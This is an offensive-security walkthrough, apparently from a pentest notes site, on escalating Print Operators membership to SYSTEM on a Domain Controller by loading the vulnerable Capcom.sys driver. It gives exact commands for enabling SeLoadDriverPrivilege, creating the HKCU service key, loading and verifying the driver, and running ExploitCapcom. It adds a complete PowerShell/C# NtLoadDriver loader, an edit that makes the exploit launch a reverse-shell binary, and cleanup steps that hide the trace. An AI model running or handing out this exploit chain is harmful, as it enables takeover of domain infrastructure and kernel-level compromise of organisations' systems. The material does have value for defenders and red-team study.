Print Operators

About

Print Operators is another highly privileged built-in group. Through the Default Domain Controllers Policy its members get SeLoadDriverPrivilege ("Load and unload device drivers") on Domain Controllers, the rights to manage, create, share, and delete printers connected to a Domain Controller, and the ability to log on locally to a Domain Controller and shut it down. Loading a kernel driver is the interesting part: anyone who can choose which driver the kernel loads can run code in ring 0, so membership is effectively equivalent to local SYSTEM on the DC.

Capcom Driver Abuse

The plan is to use the EnableSeLoadDriverPrivilege tool [LINK] to enable SeLoadDriverPrivilege in our token. Then we load the Capcom.sys [LINK] driver, originally shipped as an anti-cheat component for Capcom games; it exposes an IOCTL that runs caller-supplied code in kernel mode, so any user who can open its device can execute shellcode as SYSTEM. Because the driver carries a valid signature, Driver Signature Enforcement does not stop it from loading. We create a registry key describing the driver service, load it, confirm with DriverView [LINK] that it is actually resident, and finally run ExploitCapcom [LINK] to get a SYSTEM shell. Note that current Windows builds with HVCI or the Microsoft vulnerable driver blocklist enabled refuse to load Capcom.sys, so this chain is mainly useful against older or unhardened Domain Controllers.

Alternatively, if we have no GUI session, we change the command that ExploitCapcom launches so it runs a reverse shell for us instead of cmd.exe (see NO GUI below).

Check privs

C:\> whoami /priv

SeLoadDriverPrivilege should be listed, normally as Disabled; that is expected, and the next step enables it. If it does not appear at all, the token does not carry the group's rights (for example because the session is not on a Domain Controller) and the rest of the chain will not work.

Enable SeLoadDriverPrivilege

C:\> .\EnableSeLoadDriverPrivilege.exe

Add Reference to Driver

Download Capcom.sys to C:\temp and issue the commands below to create the driver's service key under our HKEY_CURRENT_USER tree, which we can write to without admin rights. This works because NtLoadDriver accepts any absolute registry path, so the key does not have to live under HKLM\SYSTEM. ImagePath uses the NT object-manager prefix \??\ in front of the Win32 path, and Type 1 is SERVICE_KERNEL_DRIVER.

C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\temp\Capcom.sys"

C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

Verify Driver

PS C:\> .\DriverView.exe /stext drivers.txt

PS C:\> cat drivers.txt | Select-String -pattern Capcom

Exploiting

PS C:\> .\ExploitCapcom.exe

Same stuff but automated

We can use the EoPLoadDriver tool [LINK] to automate the process: it enables the privilege, creates the registry key under HKCU, and calls NtLoadDriver with the corresponding \Registry\User\<SID>\... path. The first argument is the key path relative to HKCU, the second the driver file.

C:\> EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\temp\Capcom.sys
PS C:\> .\ExploitCapcom.exe
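The manual steps above and the EoPLoadDriver shortcut do the same three things. The PowerShell below is an added example, not code from this page or from the EoPLoadDriver/ExploitCapcom projects, that performs them natively so each failure point is visible: it confirms the privilege is present in the token, writes the service key under HKCU, enables the privilege with AdjustTokenPrivileges and calls NtLoadDriver with the absolute \Registry\User\<SID>\... path. It assumes Capcom.sys is already at C:\temp\Capcom.sys and uses the key name CAPCOM as on the page; the class name DrvLoad and the variable names are my own. Run ExploitCapcom.exe afterwards as before.

```powershell
# Added example: load Capcom.sys from an HKCU service key, the way EoPLoadDriver does.
# Assumptions (not from the page): driver already at C:\temp\Capcom.sys, key name CAPCOM.
$DriverPath = 'C:\temp\Capcom.sys'
$KeyName    = 'CAPCOM'

Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;

public static class DrvLoad
{
    [StructLayout(LayoutKind.Sequential)]
    public struct LUID { public uint LowPart; public int HighPart; }

    // TOKEN_PRIVILEGES with exactly one LUID_AND_ATTRIBUTES entry.
    [StructLayout(LayoutKind.Sequential)]
    public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }

    [StructLayout(LayoutKind.Sequential)]
    public struct UNICODE_STRING { public ushort Length; public ushort MaximumLength; public IntPtr Buffer; }

    public const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
    public const uint TOKEN_QUERY             = 0x0008;
    public const uint SE_PRIVILEGE_ENABLED    = 0x0002;
    public const int  ERROR_NOT_ALL_ASSIGNED  = 1300;

    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr h, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool LookupPrivilegeValue(string system, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll,
        ref TOKEN_PRIVILEGES newState, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("ntdll.dll")] public static extern int NtLoadDriver(ref UNICODE_STRING serviceName);

    // Returns true only if SeLoadDriverPrivilege is now enabled in the current token.
    public static bool EnableLoadDriverPrivilege()
    {
        IntPtr token;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out token)) return false;
        try
        {
            TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
            tp.PrivilegeCount = 1;
            tp.Attributes = SE_PRIVILEGE_ENABLED;
            if (!LookupPrivilegeValue(null, "SeLoadDriverPrivilege", out tp.Luid)) return false;
            if (!AdjustTokenPrivileges(token, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero)) return false;
            // AdjustTokenPrivileges returns TRUE even when the token does not hold the privilege;
            // the real verdict is ERROR_NOT_ALL_ASSIGNED in the last-error value.
            return Marshal.GetLastWin32Error() != ERROR_NOT_ALL_ASSIGNED;
        }
        finally { CloseHandle(token); }
    }

    // NtLoadDriver takes the absolute registry path of the service key, not a service name.
    public static int LoadDriver(string registryPath)
    {
        UNICODE_STRING us = new UNICODE_STRING();
        us.Length = (ushort)(registryPath.Length * 2);
        us.MaximumLength = (ushort)(us.Length + 2);
        us.Buffer = Marshal.StringToHGlobalUni(registryPath);
        try { return NtLoadDriver(ref us); }
        finally { Marshal.FreeHGlobal(us.Buffer); }
    }
}
'@

if (-not (Test-Path $DriverPath)) { throw "Driver not found at $DriverPath" }

# 1. The privilege must already be in the token (listed by whoami /priv, usually as Disabled).
if (-not (whoami /priv | Select-String 'SeLoadDriverPrivilege')) {
    throw 'SeLoadDriverPrivilege is not in this token: wrong group, or not logged on to the DC'
}

# 2. Service key under HKCU: writable by us, and NtLoadDriver accepts an absolute registry path.
$hkcuKey = "HKCU:\System\CurrentControlSet\$KeyName"
New-Item -Path $hkcuKey -Force | Out-Null
New-ItemProperty -Path $hkcuKey -Name ImagePath -PropertyType String -Value "\??\$DriverPath" -Force | Out-Null
New-ItemProperty -Path $hkcuKey -Name Type -PropertyType DWord -Value 1 -Force | Out-Null   # 1 = SERVICE_KERNEL_DRIVER

# 3. Enable the privilege, then load the driver through the \Registry\User\<SID>\ view of HKCU.
if (-not [DrvLoad]::EnableLoadDriverPrivilege()) { throw 'Could not enable SeLoadDriverPrivilege' }
$sid    = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
$ntPath = "\Registry\User\$sid\System\CurrentControlSet\$KeyName"
$status = [DrvLoad]::LoadDriver($ntPath)
'NtLoadDriver({0}) returned 0x{1:X8}' -f $ntPath, $status
# 0x00000000 STATUS_SUCCESS; 0xC000010E STATUS_IMAGE_ALREADY_LOADED is also fine (driver resident from
# an earlier attempt); 0xC0000061 STATUS_PRIVILEGE_NOT_HELD means the token never had the right;
# 0xC0000034 STATUS_OBJECT_NAME_NOT_FOUND means the service key path is wrong.
```

The NTSTATUS check at the end replaces the DriverView round trip for the common cases: a non-zero status other than STATUS_IMAGE_ALREADY_LOADED means nothing was loaded, and on a host with HVCI or the vulnerable driver blocklist active the call fails here rather than later in ExploitCapcom.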

NO GUI

For that, open ExploitCapcom.cpp, change the command line that the exploit launches as SYSTEM (the string below), and recompile. The binary named there must already be on the target, for example a reverse shell payload dropped at that path.

Before: TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");

After: TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");

Cleanup

For a little clean-up we can delete the registry key we created. Note that this only removes the trace in the registry: the driver itself stays resident until the host reboots or it is explicitly unloaded, and Capcom.sys plus the tools in C:\temp should be removed by hand as well.

C:\> reg delete HKCU\System\CurrentControlSet\Capcom
